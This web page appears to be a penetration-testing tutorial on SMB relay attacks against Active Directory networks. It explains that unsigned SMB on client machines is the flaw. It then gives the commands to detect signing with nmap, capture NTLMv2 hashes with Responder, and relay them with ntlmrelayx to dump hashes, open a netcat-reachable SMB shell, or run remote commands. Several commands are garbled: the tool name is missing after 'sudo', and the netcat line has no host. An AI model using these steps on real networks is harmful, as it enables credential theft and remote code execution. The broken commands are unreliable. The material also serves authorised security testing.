Skip to main content

SMB Relay (Internal/External)

Note: Network Environment

This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments.

What is SMB Relay?

A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).

What's the Flaw?

Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.

Detecting SMB Signing Mode

sudo nmap --script=smb2-security-mode -p445 target(s)

How is it Exploited?

Using a tool like responder, the attacker can listen for SMB client requests. If a client connects, the attacker will receive the user's NTLMv2 authentication credential -- username and NTMLv2 hash in cleartext.

Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.

The Attack

Part 1: Responder

Various responder modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf

  • Disable HTTP server (hosted by ntlmrelay)
  • Disable SMB server (hosted by ntlmrelay)
sudo responder -I <interface-name> -dvw

Part 2a: ntlmrelayx (dump hashes)

sudo -tf <targets-file> -smb2support

Part 2b: ntlmrelayx (bind shell)

Opens an SMB shell that is forwared through a socket on localhost

sudo -tf <targets-file> -smb2support -i

Once the shell is established, just use netcat to connect to the socket

nc <port>

Then, we can issue commands to the SMB shell established on the target

Part 2c: ntlmrelayx (RCE)

sudo -tf <targets-file> -smb2support -c 'command'